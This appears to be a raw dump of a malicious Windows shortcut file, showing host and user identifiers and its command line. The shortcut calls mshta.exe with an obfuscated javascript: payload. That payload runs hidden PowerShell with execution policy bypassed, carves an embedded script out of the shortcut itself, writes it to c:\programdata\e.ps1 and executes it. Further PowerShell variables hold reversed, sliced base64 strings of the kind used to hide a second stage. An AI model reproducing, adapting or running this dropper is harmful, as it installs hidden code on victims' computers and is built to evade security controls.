Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
(F*`"^jpSE
win-kejvo9cld80
$bc82=@();$wck0="vw7ICMzkzUgYnbFJSPuNHJyzbc"[21..2];$ehk1="uytUmdv1WZSpQDdhm"[13..2];$syg2="rtyBHXcpzYnASblRXSuwyz"[17..2];$acf3="psMzBnLlxFXhRXYk1WYyd2bxcglr"[22..2];$yfn4="stv7cSwyab"[5..3];$eiko5=$wck0+$ehk1+$syg2+$acf3+$yfn4;$bc82+=$eiko5 -join '';$qwe6="oqsJscCdzVWdxdCLnUmUiV2JgYWLi0XM71HM713M71nM7JCKusjIwlmeuM3ZcxVY0FGZtFmcisiIn9mcwxFX6MmIg0DImJzMwYXbvZWZzRye5JHdgkgCNASCK0wOiETPsRmJ4ZDdrlzNodTP0NnJnNncyBHO4EWen9GewFDMzgmbqZmc0t2Yx1TeltGby9DdhRmLtN1L3EzbzhGd1MzZ5dTOul2a6JTa5k2NvkmZvw2Yz9SbvNmL49mYisiIw9mck5yd3d3LvozcwJyKiQHdoJCI9AidzZHZkACIgACIK0weg0DIxUGJtuwy"[307..3];$zbe7="orwsyJzdnIgIHdvASX3MzN4kDNzITO3s1JrcyZulGZuFGc4V0JrcSZ0FGZwVVZnR2JrcSR0Z2bz9mcjl2JrcSTHFEIuR3LgIDIv12LgUGd15WatByYz9CIlRXYlJ3YvAycrdyKnMXY0h2YzdCI9AyZkASCK0AIJoQD7gGc4VGJgQULgYmMzAjdt9mZlNHJggGdhBVLgUmdph2YyFULk5WYwhXR7ISY0FGZtFmcn9mcQxFX6MkIg0DIoBHelRyO9ZmMzAjdt9mZlN3ekASZslmR0V3TtASf2NndktHJgkyJX1SZrdCLn8mdul0aej"[312..3];$qwe8="oqLgo1UfdURSBCdvAiMldyKnQXYkBXVHBidvAiIudyKnUnUc52bpNnclZFduVmcyV3QcN3dvR2J9M2bxRyOnY2LgICctRnL1QTN2IDX
\Windows
System32
mshta.exe
Y..\..\..\Windows\System32\mshta.exe
javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);
System32 (C:\Windows)
S-1-5-21-2289896217-3033761267-3699187338-1000
mshta.exe
Application
C:\Windows\System32\mshta.exe